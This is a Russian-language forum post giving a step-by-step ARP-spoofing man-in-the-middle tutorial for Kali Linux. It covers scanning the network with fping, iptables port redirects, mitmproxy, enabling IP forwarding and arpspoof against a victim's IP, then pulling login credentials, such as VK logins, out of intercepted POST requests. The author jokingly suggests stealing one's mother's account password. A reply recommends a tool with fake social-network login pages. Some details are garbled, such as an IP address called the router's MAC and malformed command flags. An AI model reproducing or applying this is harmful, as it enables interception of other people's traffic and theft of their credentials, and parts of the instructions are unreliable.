• VLMI - форум по обмену информацией. На форуме можете найти способы заработка, разнообразную информацию по интернет-безопасности, обмен знаниями, курсы/сливы.

    После регистрации будут доступны основные разделы.

    Контент форума создают пользователи, администрация за действия пользователей не несёт ответственности, отказ от ответственности. Так же перед использованием форума необходимо ознакомиться с правилами ресурса. Продолжая использовать ресурс вы соглашаетесь с правилами.
  • Подпишись на наш канал в Telegram для информации о актуальных зеркалах форума: https://t.me/vlmiclub

Атака по методу MITM

Fkeshl

Участник
Сообщения
13
Реакции
16
0 руб.
Сразу скажу метод для линуксоидов, а именно Кали 2.0

Сперва немного теории, буду объяснять своими словами
Как это происходит? - У нас есть роутер, к ним подключены два компьютера. Компьютер хакера и компьютер жертвы. Компьютер хакера меняет свой мак адрес на адрес роутера, т.е. заставляет компьютер жертвы думать, что он роутер, и отправлять ему данные по протоколам. Компьютер хакера получает данные с роутера и пропускает их через себя, отправляя данные компьютеру жертве, при этом изменяется защищенный протокол на незащищенный (по этому можно спалиться, когда в адресной строке видно что протокол незащищенный или при авторизации на учтенки в некоторых браузерах и доменах не хочет пропускать). В компьютере хакера мы имеем весь лог запросов и отправок всяких данных с компьютера жертвы. Вот и вся теория, перейдем к практике.



Сначала мы смотрим в консоли информацию о подключениях пк командой ifconfig
Мы видим что у нас IP адрес, к примеру, 192.168.1.65

Теперь с помощью команды
fping -Asg 192.168.1.0/24 -r 5 >>fping.txt сканируем информацию о сети и записываем ее в файл fping.txt
Где:
1)
192.168.1.0/24 - проводится сканирование по всем шлюзам от 0 до 255
2) цифра
5 между -r и >>fping.txt мы выбираем сколько раз мы будем сканировать сеть, лучше ее отсканить пару раз, так как за один раз может плохо отсканить и выдаст мало информации

Здесь мы с помощью команды
cat fping.txt | grep alive смотрим, кто находится в сети в режиме реального времени, т.е. юзают сеть, залазя в файл и находя строки с пометкой alive

Мы получим список IP адресов которые сейчас юзают сеть.

Смотрим мак адрес нашего роутера командой
route -n.
В колонке Gateway у нас первым елементом будет мак адрес роутера, к примеру, 192.168.1.100

Роутер атаковать не имеет смысла, так как ничего полезного мы не добудем.

Теперь нам нужно перенаправить траффик командами:

iptables -t nat -A PREROUTING -p -tcp --destination-port 80 -j REDIRECT --to-port 8080
iptables -t nat -A PREROUTING -p -tcp --destination-port 443 -j REDIRECT --to-port 8080


Далее обрабатываем данные с помощью mitmproxy (если не установлен, то установите)
Для этого пишем команду
mitmproxy -T --host

Потом нужно перенаправить данные командой echo 1 >/proc/sys/net/ipv4/ip_forward

Потом запускаем сам процесс командой arpspoof -i eth0 -t 192.168.1.13 192.168.100
Где 1-й айпишник это айпи жертвы, а 2-й айпишник роутера

Дальше с этого момента, если кто-то с компьютера жертвы будет заходить в какую-то учетку, его данные для входа будут сохранены у нас в логах. Логи можно будет посмотреть в mitmproxy, когда вы закончите атаку.

Далее в логах ищем строку, которая начинается со слова
POST и смотрим на домен, если это учетка вконтакте, то там должно быть login.vk.com, нажимаем на нее, и там будут данные для входа.

Ничего сложного, даже чайник розберется.
Вот теперь ты знаешь как узнать пароль от одноклассников своей мамки))
Удачи тебе в этом.


Если нужно больше инфо, то тебе сюда:
(не реклама)

(не реклама)

копипаст
 
Последнее редактирование:
Сообщения
76
Реакции
62
0 руб.
:cool: урок конечно хороший, но по моему мнению для "WiFi чайников" подойдет больше Pumpkin, с графической оболочкой и как по мне с очень удачно реализованными фэйками всех известных соц сетей , почт итд. И работает все стабильние чем Mitmf-s , Mitmf-htts.
 
Сверху Снизу